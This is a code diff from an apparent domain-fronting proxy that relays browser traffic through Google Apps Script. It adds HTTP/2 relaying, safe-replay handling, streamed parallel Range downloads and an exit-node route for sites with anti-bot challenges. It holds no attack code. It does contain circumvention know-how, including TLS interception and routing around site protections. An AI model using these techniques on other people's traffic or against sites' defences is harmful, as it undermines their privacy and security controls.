+    /// Two phases, two timeouts:
+    ///   * **Ready (back-pressure):** bounded by `H2_READY_TIMEOUT_SECS`
+    ///     (5 s constant). A stall here means the conn is saturated
+    ///     under `MAX_CONCURRENT_STREAMS` (or dead at the muxer level)
+    ///     but no stream has opened — `RequestSent::No`.
+    ///   * **Response (post-send):** bounded by the caller-provided
+    ///     `response_deadline`. After `send_request` returns Ok the
+    ///     headers are queued; we conservatively treat any later
+    ///     failure or timeout as `RequestSent::Maybe`. Caller picks
+    ///     the deadline so legitimate slow Apps Script calls and
+    ///     Full-mode batches with custom `request_timeout_secs` aren't
+    ///     cut off at an arbitrary fixed cap.
+    async fn h2_round_trip(
+        &self,
+        send: h2::client::SendRequest<Bytes>,
+        method: &str,
+        path: &str,
+        host: &str,
+        payload: Bytes,
+        content_type: Option<&str>,
+        response_deadline: Duration,
+    ) -> Result<(u16, Vec<(String, String)>, Vec<u8>), (FronterError, RequestSent)> {
+        // h2 requires absolute-form URIs with the :authority pseudo-header
+        // populated from the Host. http::Request's URI parser accepts
+        // `https://{host}{path}` for that.
+        let uri = format!("https://{}{}", host, path);
+        let mut builder = http::Request::builder().method(method).uri(uri);
+        // Apps Script accepts gzip on the response; mirror the h1 path so
+        // payloads stay small.
+        builder = builder.header("accept-encoding", "gzip");
+        if let Some(ct) = content_type {
+            builder = builder.header("content-type", ct);
+        }
+        let req = builder.body(()).map_err(|e| {
+            (
+                FronterError::Relay(format!("h2 request build: {}", e)),
+                RequestSent::No,
+            )
+        })?;
+
+        // Phase 1: ready/back-pressure. Bounded short. Timeout here
+        // means saturation, not server-side processing — the stream
+        // hasn't even opened, so `RequestSent::No`.
+        let ready_result = tokio::time::timeout(
+            Duration::from_secs(H2_READY_TIMEOUT_SECS),
+            send.ready(),
+        )
+        .await;
+        let mut send = match ready_result {
+            Ok(Ok(s)) => s,
+            Ok(Err(e)) => {
+                return Err((
+                    FronterError::Relay(format!("h2 ready: {}", e)),
+                    RequestSent::No,
+                ));
+            }
+            Err(_) => {
+                return Err((FronterError::Timeout, RequestSent::No));
+            }
+        };
+
+        let has_body = !payload.is_empty();
+        // send_request is synchronous; it queues the HEADERS frame.
+        // After this returns Ok we conservatively assume the request
+        // reached the server. An Err here means the stream couldn't
+        // be opened (e.g. connection-level GOAWAY), safe to retry.
+        let (response_fut, mut body_tx) = send.send_request(req, !has_body).map_err(|e| {
+            (
+                FronterError::Relay(format!("h2 send_request: {}", e)),
+                RequestSent::No,
+            )
+        })?;
+
+        if has_body {
+            // body_tx errors here are RequestSent::Maybe — headers were
+            // already queued, so we may have invoked Apps Script's doPost
+            // even if the body never finished.
+            body_tx.send_data(payload, true).map_err(|e| {
+                (
+                    FronterError::Relay(format!("h2 send_data: {}", e)),
+                    RequestSent::Maybe,
+                )
+            })?;
+        }
+
+        // Phase 2: response headers + body drain. Bounded by the
+        // caller's deadline. Errors and timeout here are
+        // `RequestSent::Maybe` — the request is on the wire and may
+        // already have side effects.
+        let response_phase = async {
+            let response = response_fut.await.map_err(|e| {
+                (
+                    FronterError::Relay(format!("h2 response: {}", e)),
+                    RequestSent::Maybe,
+                )
+            })?;
+            let (parts, mut body) = response.into_parts();
+            let status = parts.status.as_u16();
+
+            // Convert headers to the (String, String) Vec the rest of
+            // the codebase expects. Multi-valued headers (set-cookie,
+            // etc.) are expanded one entry per value, matching
+            // httparse's emission.
+            let mut headers: Vec<(String, String)> = Vec::with_capacity(parts.headers.len());
+            for (name, value) in parts.headers.iter() {
+                if let Ok(v) = value.to_str() {
+                    headers.push((name.as_str().to_string(), v.to_string()));
+                }
+            }
+
+            // Drain body. Release flow-control credit per chunk so
+            // large responses don't stall after the initial 4 MB window.
+            let mut buf: Vec<u8> = Vec::new();
+            while let Some(chunk) = body.data().await {
+                let chunk = chunk.map_err(|e| {
+                    (
+                        FronterError::Relay(format!("h2 body chunk: {}", e)),
+                        RequestSent::Maybe,
+                    )
+                })?;
+                let n = chunk.len();
+                buf.extend_from_slice(&chunk);
+                let _ = body.flow_control().release_capacity(n);
+            }
+            Ok::<_, (FronterError, RequestSent)>((status, headers, buf))
+        };
+
+        let (status, headers, mut buf) = match tokio::time::timeout(
+            response_deadline,
+            response_phase,
+        )
+        .await
+        {
+            Ok(Ok(t)) => t,
+            Ok(Err(e)) => return Err(e),
+            Err(_) => return Err((FronterError::Timeout, RequestSent::Maybe)),
+        };
+
+        // Mirror `read_http_response`: if the server gzipped the body
+        // (we asked for it via accept-encoding), decompress before
+        // handing back so downstream JSON / envelope parsers see plain
+        // bytes regardless of transport.
+        if let Some(enc) = header_get(&headers, "content-encoding") {
+            if enc.eq_ignore_ascii_case("gzip") {
+                if let Ok(decoded) = decode_gzip(&buf) {
+                    buf = decoded;
+                }
+            }
+        }
+
+        Ok((status, headers, buf))
+    }
+
+    /// Run a full relay round-trip over h2: initial POST + up to 5
+    /// redirect hops. `path` is the Apps Script `/macros/s/{id}/exec`
+    /// path. Returns the same `(status, headers, body)` triple as the
+    /// h1 path on success.
+    ///
+    /// `response_deadline` bounds the post-send phase of each round
+    /// trip (response headers + body drain). The ready/back-pressure
+    /// phase has its own short bound (`H2_READY_TIMEOUT_SECS`).
+    /// Caller picks the deadline based on its own outer budget:
+    ///   * Apps-Script direct (`relay_uncoalesced`): a few seconds
+    ///     under `REQUEST_TIMEOUT_SECS` (25 s) so an h2 timeout still
+    ///     leaves room for an h1 fallback.
+    ///   * Full-mode tunnel (`tunnel_request` / `tunnel_batch_request_to`):
+    ///     `self.batch_timeout` so the user's
+    ///     `request_timeout_secs` setting actually applies.
+    ///
+    /// On error, the second tuple field is `RequestSent::No` if the
+    /// request never reached Apps Script (safe to retry on h1) or
+    /// `RequestSent::Maybe` if it may have been processed (replaying
+    /// risks duplicating side effects for non-idempotent methods).
+    /// `ensure_h2` returning None always reports `RequestSent::No`.
+    ///
+    /// Takes `payload` as `Bytes` so callers can clone (Arc bump,
+    /// not memcpy) when they want to retain a copy for h1 fallback.
+    async fn h2_relay_request(
+        &self,
+        path: &str,
+        payload: Bytes,
+        response_deadline: Duration,
+    ) -> Result<(u16, Vec<(String, String)>, Vec<u8>), (FronterError, RequestSent)> {
+        let (send, generation) = match self.ensure_h2().await {
+            Some(s) => s,
+            None => {
+                // ensure_h2 returning None covers:
+                //   1. force_http1 / sticky-disabled — never tried h2
+                //      this call. NOT a fallback, don't count.
+                //   2. open_h2 just failed / timed out / backoff active.
+                //      We DID attempt h2 and lost it; count as fallback
+                //      so the stat reflects reality. `ensure_h2` itself
+                //      sets the backoff timestamp on failure.
+                if !self.h2_disabled.load(Ordering::Relaxed) {
+                    self.h2_fallbacks.fetch_add(1, Ordering::Relaxed);
+                }
+                return Err((
+                    FronterError::Relay("h2 unavailable".into()),
+                    RequestSent::No,
+                ));
+            }
+        };
+
+        self.run_h2_relay_with_send(send, generation, path, payload, response_deadline)
+            .await
+    }
+
+    /// Inner h2 relay loop — split out so tests can inject a
+    /// `SendRequest` (from a local h2c test server) without going
+    /// through `ensure_h2`'s real-network handshake.
+    ///
+    /// Each h2_round_trip uses its own internal phase-split timeouts
+    /// (ready=5s constant, response=`response_deadline`). No outer
+    /// wrap is needed here — the inner timeouts are what poisons the
+    /// cell on stall.
+    async fn run_h2_relay_with_send(
+        &self,
+        send: h2::client::SendRequest<Bytes>,
+        generation: u64,
+        path: &str,
+        payload: Bytes,
+        response_deadline: Duration,
+    ) -> Result<(u16, Vec<(String, String)>, Vec<u8>), (FronterError, RequestSent)> {
+        let mut current_host = self.http_host.to_string();
+        let mut current_path = path.to_string();
+
+        let res = self
+            .h2_round_trip(
+                send.clone(),
+                "POST",
+                &current_path,
+                &current_host,
+                payload,
+                Some("application/json"),
+                response_deadline,
+            )
+            .await;
+        let (mut status, mut hdrs, mut body) = match res {
+            Ok(t) => t,
+            Err((e, sent)) => {
+                self.poison_h2_if_gen(generation).await;
+                self.h2_fallbacks.fetch_add(1, Ordering::Relaxed);
+                return Err((e, sent));
+            }
+        };
+
+        // The initial POST already succeeded — the request reached
+        // Apps Script. From here on, redirect-follow failures are
+        // RequestSent::Maybe regardless of where they land in the
+        // chain, because the *original* Apps Script call may have
+        // already executed.
+        for _ in 0..5 {
+            if !matches!(status, 301 | 302 | 303 | 307 | 308) {
+                break;
+            }
+            let Some(loc) = header_get(&hdrs, "location") else {
+                break;
+            };
+            let (rpath, rhost) = parse_redirect(&loc);
+            current_host = rhost.unwrap_or(current_host);
+            current_path = rpath;
+            let res = self
+                .h2_round_trip(
+                    send.clone(),
+                    "GET",
+                    &current_path,
+                    &current_host,
+                    Bytes::new(),
+                    None,
+                    response_deadline,
+                )
+                .await;
+            match res {
+                Ok((s, h, b)) => {
+                    status = s;
+                    hdrs = h;
+                    body = b;
+                }
+                Err((e, _)) => {
+                    self.poison_h2_if_gen(generation).await;
+                    self.h2_fallbacks.fetch_add(1, Ordering::Relaxed);
+                    return Err((e, RequestSent::Maybe));
+                }
+            }
+        }
+
+        self.h2_calls.fetch_add(1, Ordering::Relaxed);
+        Ok((status, hdrs, body))
+    }
+
     /// Relay an HTTP request through Apps Script.
     /// Returns a raw HTTP/1.1 response (status line + headers + body) suitable
     /// for writing back to the browser over an MITM'd TLS stream.
@@ -563,15 +1755,65 @@ impl DomainFronter {
             url
         };
 
-        // Range requests are partial-content responses; caching or
-        // coalescing them against a non-range key would be catastrophic
-        // (wrong bytes for the wrong consumer). The range-parallel
-        // downloader calls `relay()` concurrently with N different Range
-        // headers for the same URL, and absolutely needs each call to go
-        // to the relay independently. Simplest correct answer: if any
-        // Range header is present, skip cache and coalesce entirely.
-        let has_range = headers.iter().any(|(k, _)| k.eq_ignore_ascii_case("range"));
-        let coalescible = is_cacheable_method(method) && body.is_empty() && !has_range;
+        // Exit-node short-circuit: route through the configured second-hop
+        // relay (Deno Deploy / fly.io / etc.) for hosts that need a
+        // non-Google exit IP. The cache + coalesce layer below is bypassed
+        // for these — exit-node-eligible hosts are the ones with active
+        // anti-bot challenges (CF Turnstile, ChatGPT login, Claude.ai,
+        // grok.com), and serving cached responses across users for those
+        // would be wrong (auth tokens, session state, per-user
+        // personalization). Falls back to the regular Apps Script relay
+        // if the exit node fails (network error, 5xx from the exit node, etc.)
+        // so a misconfigured or down exit node doesn't take the user
+        // offline for the sites that DON'T need it.
+        if self.exit_node_matches(url) {
+            let t0 = Instant::now();
+            match self.relay_via_exit_node(method, url, headers, body).await {
+                Ok(bytes) => {
+                    self.record_site(
+                        url,
+                        false,
+                        bytes.len() as u64,
+                        t0.elapsed().as_nanos() as u64,
+                    );
+                    return bytes;
+                }
+                Err(e) if !e.is_retryable() => {
+                    // The exit node may have already processed this
+                    // request (h2 post-send failure on a POST etc.).
+                    // Don't fall through to the direct path — that
+                    // would re-send to the same destination via Apps
+                    // Script and duplicate the side effect.
+                    tracing::warn!(
+                        "exit node failed for {} and request was already sent ({}); not falling back to direct Apps Script",
+                        url,
+                        e,
+                    );
+                    self.relay_failures.fetch_add(1, Ordering::Relaxed);
+                    let inner = e.into_inner();
+                    self.record_site(url, false, 0, t0.elapsed().as_nanos() as u64);
+                    return error_response(502, &format!("Relay error: {}", inner));
+                }
+                Err(e) => {
+                    tracing::warn!(
+                        "exit node failed for {}: {} — falling back to direct Apps Script",
+                        url,
+                        e
+                    );
+                    // fall through to the regular relay path below
+                }
+            }
+        }
+
+        // Range requests are partial-content responses; caching or
+        // coalescing them against a non-range key would be catastrophic
+        // (wrong bytes for the wrong consumer). The range-parallel
+        // downloader calls `relay()` concurrently with N different Range
+        // headers for the same URL, and absolutely needs each call to go
+        // to the relay independently. Simplest correct answer: if any
+        // Range header is present, skip cache and coalesce entirely.
+        let has_range = headers.iter().any(|(k, _)| k.eq_ignore_ascii_case("range"));
+        let coalescible = is_cacheable_method(method) && body.is_empty() && !has_range;
         let key = if coalescible { Some(cache_key(method, url)) } else { None };
         let t_start = Instant::now();
 
@@ -641,36 +1883,105 @@ impl DomainFronter {
     ///      defined, and the user-sent-Range-header case is handled
     ///      by relay() already (we skip cache for it).
     ///   2. Probe with `Range: bytes=0-<chunk-1>`.
-    ///   3. 200 back (origin doesn't support ranges) → return as-is.
-    ///   4. 206 back → parse Content-Range total. If the body fits in
-    ///      the first probe (total <= chunk or body >= total), rewrite
-    ///      the 206 to a 200 so the client — which never asked for a
+    ///   3. 200 back (origin doesn't support ranges) → write as-is.
+    ///   4. 206 back → parse Content-Range total. If Content-Range says
+    ///      the entity fits in the first probe, rewrite the 206 to a 200
+    ///      so the client — which never asked for a
     ///      range — doesn't choke on a stray Partial Content. (x.com
     ///      and Cloudflare turnstile in particular reject unsolicited
     ///      206 on XHR/fetch.)
     ///   5. Else: compute the remaining ranges, fetch them with
-    ///      bounded concurrency, stitch, return as 200.
+    ///      bounded concurrency. Two output modes:
+    ///        * `total ≤ APPS_SCRIPT_BODY_MAX_BYTES` (buffered): stitch
+    ///          all chunks into one `Vec<u8>`, transform the response
+    ///          head, write to caller in one shot. On chunk failure,
+    ///          fall back to a single GET — Apps Script can deliver
+    ///          the file in one piece up to its ~40 MiB cap. Safety
+    ///          net intact.
+    ///        * `total > APPS_SCRIPT_BODY_MAX_BYTES` (streaming): write
+    ///          the response head with `Content-Length: total` and the
+    ///          probe body straight to the client, then stream each
+    ///          remaining chunk to the client as it arrives in order.
+    ///          No buffered fallback (we've already committed bytes on
+    ///          the wire), but single-GET fallback wouldn't fit through
+    ///          Apps Script for files this size anyway — streaming with
+    ///          truncation on hard chunk failure beats today's 25s
+    ///          timeout + 504 (#1042).
     ///
-    /// If any later chunk fails validation or fetch, we fall back to the
-    /// probe's single-chunk response as a graceful-degradation, but we do
-    /// not stitch unchecked bytes into a fake full-success response.
-    pub async fn relay_parallel_range(
+    /// `transform_head` lets the caller rewrite the response head block
+    /// (e.g. CORS injection) without coupling this module to the
+    /// caller's policy. The input is the head bytes from "HTTP/1.x …"
+    /// through the trailing `\r\n\r\n`; the output should be the same
+    /// shape. Pass an identity closure if no rewrite is needed.
+    pub async fn relay_parallel_range_to<W, F>(
         &self,
+        writer: &mut W,
         method: &str,
         url: &str,
         headers: &[(String, String)],
         body: &[u8],
-    ) -> Vec<u8> {
+        transform_head: F,
+    ) -> std::io::Result<()>
+    where
+        W: tokio::io::AsyncWrite + Unpin,
+        F: Fn(&[u8]) -> Vec<u8>,
+    {
+        self.do_relay_parallel_range_to(
+            writer,
+            method,
+            url,
+            headers,
+            body,
+            &transform_head,
+            /*streaming_allowed=*/ true,
+        )
+        .await
+    }
+
+    /// Shared dispatch for [`Self::relay_parallel_range_to`] (streaming
+    /// enabled) and [`Self::relay_parallel_range`] (the `Vec<u8>`
+    /// compatibility wrapper, streaming disabled).
+    ///
+    /// When `streaming_allowed=false`, the function refuses the
+    /// streaming branch even when the response is large enough to
+    /// warrant it — instead falling back to a plain `self.relay()`
+    /// single GET, matching the pre-1.9.23 wrapper contract that a
+    /// `Vec<u8>` return must never be a fake-200 with the
+    /// `Content-Length` of the full advertised total but only a
+    /// prefix of the body (Issue #162). The streaming branch can
+    /// commit head + partial body before discovering a chunk
+    /// failure; that's correct for a wire writer (download client
+    /// sees Content-Length mismatch, retries via Range from the
+    /// partial position) but a buffered `Vec<u8>` consumer has no
+    /// way to react to the truncation, so we keep them off that
+    /// path entirely.
+    #[allow(clippy::too_many_arguments)]
+    async fn do_relay_parallel_range_to<W, F>(
+        &self,
+        writer: &mut W,
+        method: &str,
+        url: &str,
+        headers: &[(String, String)],
+        body: &[u8],
+        transform_head: &F,
+        streaming_allowed: bool,
+    ) -> std::io::Result<()>
+    where
+        W: tokio::io::AsyncWrite + Unpin,
+        F: Fn(&[u8]) -> Vec<u8>,
+    {
         const MAX_PARALLEL: usize = 16;
         let chunk = RANGE_PARALLEL_CHUNK_BYTES;
 
         if method != "GET" || !body.is_empty() {
-            return self.relay(method, url, headers, body).await;
+            let raw = self.relay(method, url, headers, body).await;
+            return write_response_with_head_transform(writer, &raw, &transform_head).await;
         }
         // If the client already sent a Range header, honour it as-is —
         // don't second-guess a caller that knows what bytes they want.
         if headers.iter().any(|(k, _)| k.eq_ignore_ascii_case("range")) {
-            return self.relay(method, url, headers, body).await;
+            let raw = self.relay(method, url, headers, body).await;
+            return write_response_with_head_transform(writer, &raw, &transform_head).await;
         }
 
         // Probe with the first chunk.
@@ -680,13 +1991,15 @@ impl DomainFronter {
 
         let (status, resp_headers, resp_body) = match split_response(&first) {
             Some(v) => v,
-            None => return first,
+            None => {
+                return write_response_with_head_transform(writer, &first, &transform_head).await
+            }
         };
 
         if status != 206 {
             // Origin returned the whole thing (or an error). Either way,
             // pass through.
-            return first;
+            return write_response_with_head_transform(writer, &first, &transform_head).await;
         }
 
         let probe_range = match validate_probe_range(status, &resp_headers, resp_body, chunk - 1)
@@ -697,64 +2010,127 @@ impl DomainFronter {
                     "range-parallel: probe returned invalid 206 for {}; falling back to single GET",
                     url,
                 );
-                return self.relay(method, url, headers, body).await;
+                let raw = self.relay(method, url, headers, body).await;
+                return write_response_with_head_transform(writer, &raw, &transform_head).await;
             }
         };
         let total = probe_range.total;
 
         if total <= chunk || (probe_range.end + 1) >= total {
-            return rewrite_206_to_200(&first);
+            let raw = rewrite_206_to_200(&first);
+            return write_response_with_head_transform(writer, &raw, &transform_head).await;
         }
 
-        let total_usize = match checked_stitched_range_capacity(total) {
-            Some(v) => v,
-            None => {
-                tracing::warn!(
-                    "range-parallel: Content-Range total {} for {} is too large; falling back to single GET",
+        // Range planning is lazy via `plan_remaining_ranges` — a hostile
+        // origin can advertise `Content-Range: bytes 0-262143/<huge>` and
+        // pass the probe checks (matching 256 KiB body, claimed total >
+        // probe end), so eagerly building a `Vec<(u64, u64)>` for the
+        // full plan would let it drive arbitrary allocations on the
+        // stream branch (a 100 TiB advertised total at 256 KiB chunks
+        // is ~400M tuples, ~6 GB). PR #151's original `MAX_STITCHED_…`
+        // guard prevented this on the buffered side; lazy iteration
+        // preserves that protection for streaming without imposing a
+        // hard ceiling on legitimate large downloads.
+        let probe_end = probe_range.end;
+        let expected_chunks = (total - probe_end - 1).div_ceil(chunk);
+
+        // Branch: buffered stitch (fallback-safe) vs. streaming vs.
+        // single-GET fallback for the compat wrapper. See
+        // `dispatch_range_response` doc for the per-caller contract.
+        match dispatch_range_response(total, streaming_allowed) {
+            RangeDispatch::Stream => {
+                tracing::info!(
+                    "range-parallel-stream: {} bytes total, {} chunks after probe, up to {} in flight",
+                    total, expected_chunks, MAX_PARALLEL,
+                );
+                let fetches = self.fetch_chunks_stream(
+                    url,
+                    headers,
+                    plan_remaining_ranges(probe_end, total, chunk),
+                    total,
+                    MAX_PARALLEL,
+                );
+                return stream_range_response_to(
+                    writer,
+                    &resp_headers,
+                    resp_body,
                     total,
+                    fetches,
+                    transform_head,
                     url,
+                )
+                .await;
+            }
+            RangeDispatch::FallbackSingleGet => {
+                // `Vec<u8>` wrapper above 64 MiB: stream branch is
+                // off-limits (truncate-then-Err can't be reacted to),
+                // so we fall back to a single GET — same path the
+                // pre-1.9.23 wrapper took above its 64 MiB cap. Apps
+                // Script will typically return 502/504 because the
+                // response exceeds its delivery ceiling, but that's
+                // the contract: callers see Apps Script's error, not
+                // a half-written success.
+                tracing::info!(
+                    "range-parallel: {} bytes total > {} buffered cap and streaming disallowed; falling back to single GET",
+                    total, BUFFERED_STITCH_MAX_BYTES,
                 );
-                return self.relay(method, url, headers, body).await;
+                let raw = self.relay(method, url, headers, body).await;
+                return write_response_with_head_transform(writer, &raw, transform_head).await;
+            }
+            RangeDispatch::RejectTooLarge => {
+                // Quota-DoS guard: refuse the response. Streaming
+                // an advertised 16 GiB+ total would issue ~65 k
+                // chunk Apps Script calls (~daily quota on the free
+                // tier) per pwned URL — see `MAX_STREAMED_RANGE_BYTES`.
+                // 502 is the right status: this is upstream-induced
+                // refusal, not a client error.
+                tracing::warn!(
+                    "range-parallel: refusing {} bytes total for {} — exceeds {} streaming cap",
+                    total, url, MAX_STREAMED_RANGE_BYTES,
+                );
+                let raw = error_response(
+                    502,
+                    "Advertised Content-Range total exceeds relay's streaming \
+                     ceiling. The origin reported a size larger than the relay \
+                     is willing to fetch through Apps Script; refusing to spend \
+                     daily quota on a likely-hostile or buggy origin.",
+                );
+                return write_response_with_head_transform(writer, &raw, transform_head).await;
+            }
+            RangeDispatch::Buffered => {
+                // Fall through to the buffered stitch code below.
             }
-        };
-
-        // Plan remaining ranges after what the probe already returned.
-        let mut ranges: Vec<(u64, u64)> = Vec::new();
-        let mut start = probe_range.end + 1;
-        while start < total {
-            let end = (start + chunk - 1).min(total - 1);
-            ranges.push((start, end));
-            start = end + 1;
         }
 
         tracing::info!(
             "range-parallel: {} bytes total, {} chunks remaining after probe, up to {} in flight",
-            total, ranges.len(), MAX_PARALLEL,
+            total, expected_chunks, MAX_PARALLEL,
         );
 
+        // Buffered stitch. `total` is bounded above by
+        // `BUFFERED_STITCH_MAX_BYTES` (64 MiB) for the `Vec<u8>`
+        // wrapper path and by `APPS_SCRIPT_BODY_MAX_BYTES` (40 MiB)
+        // for the writer-based API — see `dispatch_range_response`.
+        // Either way, well inside `usize` even on 32-bit targets, and
+        // the lazy range iterator produces at most ~256 tuples for a
+        // 64 MiB total at 256 KiB chunks, so collecting results into
+        // `Vec<_>` for stitching is cheap.
+        let total_usize = total as usize;
+
         // Concurrent fetch with `buffered` — preserves input order
         // (important for stitching) and caps in-flight count. Each task
         // calls back into `relay()`, which already has retry + fan-out
         // wiring on single-request granularity; we don't duplicate
         // those here.
-        use futures_util::stream::{self, StreamExt};
-        let url_owned = url.to_string();
-        let base_headers = headers.to_vec();
-        let fetches = stream::iter(ranges.into_iter())
-            .map(|(s, e)| {
-                let url = url_owned.clone();
-                let mut h = base_headers.clone();
-                // Force a single Range header — if the caller's headers
-                // somehow already had one we wouldn't be here, but be
-                // defensive anyway.
-                h.retain(|(k, _)| !k.eq_ignore_ascii_case("range"));
-                h.push(("Range".into(), format!("bytes={}-{}", s, e)));
-                async move {
-                    let raw = self.relay("GET", &url, &h, &[]).await;
-                    (s, e, extract_exact_range_body(&raw, s, e, total))
-                }
-            })
-            .buffered(MAX_PARALLEL)
+        use futures_util::stream::StreamExt;
+        let fetches = self
+            .fetch_chunks_stream(
+                url,
+                headers,
+                plan_remaining_ranges(probe_end, total, chunk),
+                total,
+                MAX_PARALLEL,
+            )
             .collect::<Vec<_>>()
             .await;
 
@@ -765,31 +2141,142 @@ impl DomainFronter {
             match chunk {
                 Ok(chunk) => full.extend_from_slice(&chunk),
                 Err(reason) => {
+                    // Issue #162: silently rewriting the probe to a 200
+                    // here truncates the response to whatever the probe
+                    // saw (typically 256 KiB — the chunk size). Browsers
+                    // see HTTP 200 + Content-Length=262144 and treat
+                    // the download as complete; users reported "every
+                    // file capped at 256 KB" because every download
+                    // that hit this failure path landed there. Common
+                    // triggers: Apps Script stripping Content-Range,
+                    // origin returning 200-instead-of-206 on later
+                    // chunks, total mismatch across chunks. Correct
+                    // recovery is a fresh single GET — Apps Script
+                    // fetches the full URL up to its ~40 MiB cap. Slow
+                    // for big files vs. the parallel path but produces
+                    // a complete response, which is what matters.
                     tracing::warn!(
-                        "range-parallel: invalid chunk {}-{} for {} ({}); falling back to probe response",
-                        start,
-                        end,
-                        url,
-                        reason,
+                        "range-parallel: invalid chunk {}-{} for {} ({}); falling back to single GET",
+                        start, end, url, reason,
                     );
-                    return rewrite_206_to_200(&first);
+                    let raw = self.relay(method, url, headers, body).await;
+                    return write_response_with_head_transform(writer, &raw, &transform_head)
+                        .await;
                 }
             }
         }
 
         if (full.len() as u64) != total {
+            // Same fallback rationale as the chunk-validation case
+            // above: returning the probe truncates to 256 KiB. Single
+            // GET is the only way to give the user a complete file
+            // when the parallel stitch can't be trusted.
             tracing::warn!(
-                "range-parallel: stitched {}/{} bytes for {}; falling back to probe response",
+                "range-parallel: stitched {}/{} bytes for {}; falling back to single GET",
                 full.len(), total, url,
             );
-            return rewrite_206_to_200(&first);
+            let raw = self.relay(method, url, headers, body).await;
+            return write_response_with_head_transform(writer, &raw, &transform_head).await;
         }
 
         // Build a 200 OK with Content-Length = full body length. Drop
         // the Content-Range header (no longer applicable) and
         // Transfer-Encoding/Content-Encoding (origin already decoded
         // what we got; we ship plain bytes).
-        assemble_full_200(&resp_headers, &full)
+        let raw = assemble_full_200(&resp_headers, &full);
+        write_response_with_head_transform(writer, &raw, &transform_head).await
+    }
+
+    /// Backward-compatible wrapper around `relay_parallel_range_to`
+    /// that buffers the full response into a `Vec<u8>` before
+    /// returning. Retained so downstream callers (and external
+    /// consumers of `mhrv-rs` as a library) that depend on the pre-
+    /// 1.9.23 `-> Vec<u8>` signature keep working without code
+    /// changes. New code should prefer `relay_parallel_range_to`,
+    /// which streams large files chunk-by-chunk instead of buffering
+    /// the response in memory.
+    ///
+    /// **Pre-1.9.23 contract preservation:** for responses above the
+    /// buffered ceiling (`BUFFERED_STITCH_MAX_BYTES`, 64 MiB) the
+    /// wrapper deliberately falls back to a single `relay()` call
+    /// rather than taking the streaming branch. Streaming commits a
+    /// `200 OK` head with `Content-Length: <total>` plus a partial
+    /// body before discovering chunk failures — that's correct for a
+    /// wire writer (download client retries via Range) but exactly
+    /// the "fake-truncated-success" contract violation from Issue
+    /// #162 once the bytes are collected into a buffer the caller
+    /// can't react to. Wrapper callers therefore see the same upper
+    /// bound on response size and the same fallback semantics they
+    /// had before 1.9.23; only the failure surface changes (502/504
+    /// from Apps Script for the >40 MiB case, same as before).
+    pub async fn relay_parallel_range(
+        &self,
+        method: &str,
+        url: &str,
+        headers: &[(String, String)],
+        body: &[u8],
+    ) -> Vec<u8> {
+        let mut buf: Vec<u8> = Vec::new();
+        let identity = |head: &[u8]| head.to_vec();
+        // Writing to a `Vec<u8>` through `VecAsyncWriter` never fails
+        // (no I/O), so the `io::Result` from the writer-based API is
+        // always `Ok` here — modulo the streaming branch's chunk-
+        // validation error path. Disabling streaming
+        // (`streaming_allowed=false`) keeps the wrapper off that
+        // path, so the only `Err` cases left are unreachable for
+        // `VecAsyncWriter`.
+        let _ = self
+            .do_relay_parallel_range_to(
+                &mut VecAsyncWriter(&mut buf),
+                method,
+                url,
+                headers,
+                body,
+                &identity,
+                /*streaming_allowed=*/ false,
+            )
+            .await;
+        buf
+    }
+
+    /// Build the concurrent fetch stream used by both the buffered and
+    /// streaming branches of `relay_parallel_range_to`. Each yielded
+    /// item is `(start, end, Result<chunk_body, validation_reason>)`
+    /// in input order (via `buffered`, which preserves order while
+    /// capping in-flight count). Splitting this out keeps the
+    /// branching at the call site small and lets tests for the
+    /// streaming writer use a synthetic `Stream` with no
+    /// `DomainFronter` dependency.
+    fn fetch_chunks_stream<'a, I>(
+        &'a self,
+        url: &str,
+        base_headers: &[(String, String)],
+        ranges: I,
+        total: u64,
+        max_parallel: usize,
+    ) -> impl futures_util::Stream<Item = (u64, u64, Result<Vec<u8>, &'static str>)> + 'a
+    where
+        I: IntoIterator<Item = (u64, u64)> + 'a,
+        I::IntoIter: 'a,
+    {
+        use futures_util::stream::{self, StreamExt};
+        let url_owned = url.to_string();
+        let base_h = base_headers.to_vec();
+        stream::iter(ranges)
+            .map(move |(s, e)| {
+                let url = url_owned.clone();
+                let mut h = base_h.clone();
+                // Force a single Range header — if the caller's headers
+                // somehow already had one we wouldn't be here, but be
+                // defensive anyway.
+                h.retain(|(k, _)| !k.eq_ignore_ascii_case("range"));
+                h.push(("Range".into(), format!("bytes={}-{}", s, e)));
+                async move {
+                    let raw = self.relay("GET", &url, &h, &[]).await;
+                    (s, e, extract_exact_range_body(&raw, s, e, total))
+                }
+            })
+            .buffered(max_parallel)
     }
 
     async fn relay_uncoalesced(
@@ -859,14 +2346,50 @@ impl DomainFronter {
         // Fan-out path: fire N instances in parallel, return first Ok, cancel
         // the rest. Clamps to number of available script IDs so the single-ID
         // case is a no-op even if parallel_relay>1 was configured.
+        //
+        // `select_ok` cancels the loser futures, but those futures only own
+        // the OUR-side I/O (TLS write, response read) — the Apps Script
+        // server has no idea the racing Rust task is gone, so every fan-out
+        // call still completes server-side and Apps Script's
+        // `UrlFetchApp.fetch()` to the destination still fires. For
+        // **non-idempotent** methods (POST / PUT / PATCH / DELETE) this
+        // surfaces as duplicate writes at the destination — a comment
+        // posted twice, a vote double-counted, a payment double-charged.
+        //
+        // Reported in #743: parallel_relay=2 + a POST to GitHub created
+        // two issue comments per submission. Same root cause as the
+        // SAFE_REPLAY_METHODS guard in Code.gs's `_doBatch` fallback —
+        // safe methods are idempotent, so re-firing is at worst wasteful;
+        // unsafe methods can have side effects, so re-firing is incorrect.
+        //
+        // Drop to sequential for non-idempotent methods regardless of
+        // `parallel_relay` setting. Users keep p95 wins on browsing /
+        // GET-heavy traffic (the common case) and don't lose correctness
+        // on form submits.
+        let method_safe_for_fanout = is_method_safe_for_fanout(method);
         let fan = self.parallel_relay.min(self.script_ids.len()).max(1);
-        if fan >= 2 {
+        if fan >= 2 && method_safe_for_fanout {
             return self.do_relay_parallel(method, url, headers, body, fan).await;
         }
 
-        // Sequential path: one retry on connection failure.
+        // Sequential path: one retry on connection failure, *unless*
+        // the failure is `FronterError::NonRetryable` — that wrapper
+        // says "the request may have already reached the server, do
+        // not duplicate." Without this guard, an h2 post-send failure
+        // on a non-idempotent method (POST/PUT/PATCH/DELETE) that the
+        // h2 layer correctly refused to replay on h1 would be
+        // re-issued here anyway, defeating the safety policy.
         match self.do_relay_once(method, url, headers, body).await {
             Ok(v) => Ok(v),
+            Err(e) if !e.is_retryable() => {
+                tracing::warn!(
+                    "relay attempt 1 failed and is non-retryable ({}); not duplicating {} {}",
+                    e,
+                    method,
+                    url,
+                );
+                Err(e.into_inner())
+            }
             Err(e) => {
